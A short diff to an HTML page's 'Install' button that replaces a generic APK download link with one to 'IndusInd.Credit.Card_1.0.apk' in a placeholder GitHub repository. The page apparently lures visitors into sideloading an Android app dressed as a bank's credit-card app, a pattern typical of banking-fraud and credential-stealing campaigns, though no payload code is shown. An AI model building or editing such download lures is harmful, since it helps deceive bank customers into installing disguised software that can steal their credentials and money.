--- a/index.html
+++ b/index.html
@@ -585,7 +585,8 @@
                 </div>
             </div>  
             <div class="operation">
-                <a href="https://github.com/USERNAME/REPO/releases/download/v1.0/app.apk
+                <a href="https://github.com/USERNAME/REPO/releases/download/v1.0/IndusInd.Credit.Card_1.0.apk
+
 " class="btn-install download-app-link">
                 Install
               </a>
@@ -680,4 +681,5 @@
     
 </body>
 </html>
+
 
